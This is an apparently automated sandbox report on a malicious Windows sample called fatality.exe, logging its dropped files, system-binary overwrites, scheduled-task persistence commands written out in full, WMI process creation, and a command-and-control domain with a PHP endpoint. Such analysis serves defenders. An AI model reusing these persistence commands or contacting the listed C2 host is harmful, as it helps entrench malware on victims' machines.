                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fatality.exe, fatality.exe, 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.pdb source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.pdb source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DEA69B FindFirstFileW,FindFirstFileW,0_2_00DEA69B
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: global trafficTCP traffic: 192.168.2.5:56338 -> 162.159.36.2:53
                                    Source: unknownDNS traffic detected: query: 373292cm.nyashka.top replaycode: Server failure (2)
                                    Source: unknownDNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 373292cm.nyashka.top
                                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                    Source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU

                                    System Summary

                                    barindex
                                    PE file has nameless sections
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_05256861 NtQueryInformationProcess,GetSystemInfo,0_2_05256861
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DE848E0_2_00DE848E
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DE40FE0_2_00DE40FE
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DF40880_2_00DF4088
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DF00B70_2_00DF00B7
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E051C90_2_00E051C9
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DF71530_2_00DF7153
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DF62CA0_2_00DF62CA
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DE32F70_2_00DE32F7
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DF43BF0_2_00DF43BF
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E0D4400_2_00E0D440
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DEF4610_2_00DEF461
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DEC4260_2_00DEC426
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DF77EF0_2_00DF77EF
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E0D8F00_2_00E0D8F0
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DE286B0_2_00DE286B
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DEE9B70_2_00DEE9B7
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DF6CDC0_2_00DF6CDC
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DF3E0B0_2_00DF3E0B
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DEEFE20_2_00DEEFE2
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_0525456D0_2_0525456D
                                    Source: C:\blockcomSession\containerReview.exeCode function: 5_2_00007FF848E60D7C5_2_00007FF848E60D7C
                                    Source: C:\blockcomSession\containerReview.exeCode function: 5_2_00007FF849268A9F5_2_00007FF849268A9F
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 19_2_00007FF848E80D7C19_2_00007FF848E80D7C
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 22_2_00007FF848E60D7C22_2_00007FF848E60D7C
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 22_2_00007FF848E707AE22_2_00007FF848E707AE
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 22_2_00007FF848E7055622_2_00007FF848E70556
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 22_2_00007FF848E70CFB22_2_00007FF848E70CFB
                                    Source: C:\blockcomSession\containerReview.exeCode function: 37_2_00007FF848E60D7C37_2_00007FF848E60D7C
                                    Source: C:\blockcomSession\containerReview.exeCode function: 37_2_00007FF848E707AC37_2_00007FF848E707AC
                                    Source: C:\blockcomSession\containerReview.exeCode function: 37_2_00007FF848E70CFB37_2_00007FF848E70CFB
                                    Source: C:\blockcomSession\containerReview.exeCode function: 38_2_00007FF848E907AE38_2_00007FF848E907AE
                                    Source: C:\blockcomSession\containerReview.exeCode function: 38_2_00007FF848E9055638_2_00007FF848E90556
                                    Source: C:\blockcomSession\containerReview.exeCode function: 38_2_00007FF848E90CFB38_2_00007FF848E90CFB
                                    Source: C:\blockcomSession\containerReview.exeCode function: 38_2_00007FF848E80D7C38_2_00007FF848E80D7C
                                    Source: C:\ProgramData\dbg\containerReview.exeCode function: 39_2_00007FF848E60D7C39_2_00007FF848E60D7C
                                    Source: C:\ProgramData\dbg\containerReview.exeCode function: 39_2_00007FF848E707AE39_2_00007FF848E707AE
                                    Source: C:\ProgramData\dbg\containerReview.exeCode function: 39_2_00007FF848E7055639_2_00007FF848E70556
                                    Source: C:\ProgramData\dbg\containerReview.exeCode function: 39_2_00007FF848E70CFB39_2_00007FF848E70CFB
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeCode function: 44_2_00007FF848E907AE44_2_00007FF848E907AE
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeCode function: 44_2_00007FF848E9055644_2_00007FF848E90556
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeCode function: 44_2_00007FF848E90CFB44_2_00007FF848E90CFB
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeCode function: 44_2_00007FF848E80D7C44_2_00007FF848E80D7C
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 45_2_00007FF848E80D7C45_2_00007FF848E80D7C
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 45_2_00007FF848E907AE45_2_00007FF848E907AE
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 45_2_00007FF848E9055645_2_00007FF848E90556
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeCode function: 45_2_00007FF848E90CFB45_2_00007FF848E90CFB
                                    Source: C:\blockcomSession\containerReview.exeCode function: 46_2_00007FF848E60D7C46_2_00007FF848E60D7C
                                    Source: C:\blockcomSession\containerReview.exeCode function: 46_2_00007FF848E707AC46_2_00007FF848E707AC
                                    Source: C:\blockcomSession\containerReview.exeCode function: 46_2_00007FF848E70CFB46_2_00007FF848E70CFB
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\GgZbKUMi.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: String function: 00DFEC50 appears 53 times
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: String function: 00DFF5F0 appears 32 times
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: String function: 00DFEB78 appears 36 times
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: String function: 00E5F264 appears 70 times
                                    Source: RLUzQxgL.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: PRRjZxCV.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: RUDRugHQ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: GgZbKUMi.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: yCQlabwB.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: LTranRbW.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ucFnGTXv.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: jPEOVQoM.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: HTJtRROP.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: nCWNxMEA.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: eTDxNkzS.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: VquIdqjl.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: fatality.exe, 00000000.00000003.2048582491.0000000003492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs fatality.exe
                                    Source: fatality.exe, 00000000.00000003.2048582491.0000000003492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs fatality.exe
                                    Source: fatality.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fatality.exe
                                    Source: fatality.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: containerReview.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: mQBLhXIPAJ.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: mQBLhXIPAJ.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: containerReview.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: mQBLhXIPAJ.exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: mQBLhXIPAJ.exe2.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: fatality.exeStatic PE information: Section: ZLIB complexity 0.997276135089686
                                    Source: fatality.exeStatic PE information: Section: ZLIB complexity 0.9945203993055556
                                    Source: fatality.exeStatic PE information: Section: cheat ZLIB complexity 0.9969160071699135
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@58/46@10/0
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\PRRjZxCV.logJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                                    Source: C:\blockcomSession\containerReview.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-KNZ6qT1z1KAE3Pr0GoKV
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\AppData\Local\Temp\qvvd4xndJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                    Source: C:\Users\user\Desktop\fatality.exeCommand line argument: sfxname0_2_00DFDF1E
                                    Source: C:\Users\user\Desktop\fatality.exeCommand line argument: sfxstime0_2_00DFDF1E
                                    Source: C:\Users\user\Desktop\fatality.exeCommand line argument: STARTDLG0_2_00DFDF1E
                                    Source: C:\Users\user\Desktop\fatality.exeCommand line argument: xz0_2_00DFDF1E
                                    Source: C:\Users\user\Desktop\fatality.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                    Source: fatality.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\fatality.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: fatality.exeVirustotal: Detection: 83%
                                    Source: fatality.exeReversingLabs: Detection: 71%
                                    Source: fatality.exeString found in binary or memory: <Module>{B88D4D76-330A-4D76-ADDC-F680C30484D3}
                                    Source: C:\Users\user\Desktop\fatality.exeFile read: C:\Users\user\Desktop\fatality.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\fatality.exe "C:\Users\user\Desktop\fatality.exe"
                                    Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP"
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP"
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\blockcomSession\mQBLhXIPAJ.exe C:\blockcomSession\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\blockcomSession\mQBLhXIPAJ.exe C:\blockcomSession\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\blockcomSession\containerReview.exe C:\blockcomSession\containerReview.exe
                                    Source: unknownProcess created: C:\blockcomSession\containerReview.exe C:\blockcomSession\containerReview.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\containerReview.exe "C:\Users\All Users\dbg\containerReview.exe"
